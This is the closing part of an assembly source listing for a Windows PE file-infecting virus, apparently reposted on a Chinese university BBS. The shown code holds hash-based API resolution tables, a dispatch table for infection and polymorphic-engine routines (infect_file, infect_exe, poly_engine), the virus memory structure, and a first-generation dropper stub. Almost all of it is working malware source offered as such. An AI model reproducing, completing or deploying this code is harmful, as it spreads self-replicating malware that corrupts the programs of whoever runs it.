dw x lpCreateMutexA
dw x lpGetLastError
dw x lpReleaseMutex
dw x lpExitProcess
dw x lpCreateFileMappingA
dw x lpMapViewOfFile
dw x lpUnMapViewOfFile
dw x lpGetSystemDirectory
dw x lpWriteFile
dw x lpCreateProcessA
dw x lpOpenProcess
dw x lpWaitForSingleObject
dw x lpRegisterServiceProcess
dw x lpGetFileSize
dw x lpGlobalAlloc
dw x lpGlobalFree
dw x lpReadFile
dw x lpSetFilePointer
dw x lpSetErrorMode
dw x lpGetCurrentProcessId
dw x lpGetVersion
dw x lpGetTickCount
dw x malloc+63
dw x malloc+51
dw x malloc+106
dw x infect_file-2
count equ ($-k32_addrs)/2
k32_crcs equ this byte
dd 08C892DDFh ;CreateFileA
dd 068624A9Dh ;CloseHandle
dd 020B943E7h ;CreateMutexA
dd 087D52C94h ;GetLastError
dd 0C449CF4Eh ;ReleaseMutexA
dd 040F57181h ;ExitProcess
dd 096B2D96Ch ;CreateFileMappingA
dd 0797B49ECh ;MapViewOfFile
dd 094524B42h ;UnMapViewOfFile
dd 0593AE7CEh ;GetSystemDirectoryA
dd 021777793h ;WriteFile
dd 0267E0B05h ;CreateProcessA
dd 033D350C4h ;OpenProcess
dd 0D4540229h ;WaitForSingleObject
dd 05F31BC8Eh ;RegisterServiceProcess
dd 0EF7D811Bh ;GetFileSize
dd 083A353C3h ;GlobalAlloc
dd 05CDF6B6Ah ;GlobalFree
dd 054D8615Ah ;ReadFile
dd 085859D42h ;SetFilePointer
dd 0A2EB817Bh ;SetErrorMode
dd 0EB1CE85Ch ;GetCurrentProcessId
dd 042F13D06h ;GetVersion
dd 0613FD7BAh ;GetTickCount
dd 041D64912h ;OpenFileMappingA
dd 0797B49ECh ;MapViewOfFile (other address)
dd 019F33607h ;CreateThread
dd 00AC136BAh ;Sleep
dd 0
process_maps equ this byte
dw x infect_file
dw x check_infected
dw x create_infected
dw x infect_hlp
dw x infect_exe
dw x poly_engine
dw x checksum
p_number equ ($-process_maps)/2
dw x malloc+95
process_memory struc
thandle dd 0 ;returned thread handle by dropper
th_mempos dd 0 ;thread body memory position
process dd p_number dup (0,0) ;hProcess (Wait), ProcessID (Open)
apiz dd count-2 dup (0) ;all API functionz without two last
active db p_number dup (0) ;active process (=function) ?
paramz dd 8 dup (0) ;process parameters
vbody db vsize dup (0) ;virus body (poly, valuez)
; filename dd 260 dup (0) ;name of file (opening, etc)
ci_size equ 2*16*(tbyte+tbyte) ;check_infected fpu buffer
; cinfected db ci_size dup(0)
; poly_vbody equ this byte
; ** This is Tasm32 bug, cannot asm through const->proc + dup
ends
align 4
file_end:
db 68 dup(0)
mem_end:
push 401000h
sub esp,vsize
jmp vstart
fgx:db "E:\X_WIN\ABCD.EXE",0
fg0:mov edx,offset fgx
sub eax,eax
push eax 80h 3 eax eax 0c0000000h edx
call CreateFileA
push 0 0
call fg1
db "Dream - welcome to my world...",0
fg1:call fg2
db "First generation sample written by atm(郭宏硕)",0
fg2:push 0
call MessageBoxA
call ExitProcess
end mem_end
------------------------------pevirus.exe code in asm
end-------------------------------------------------------
文章出处:第八军团
文章作者:JunTuan
--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.127]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店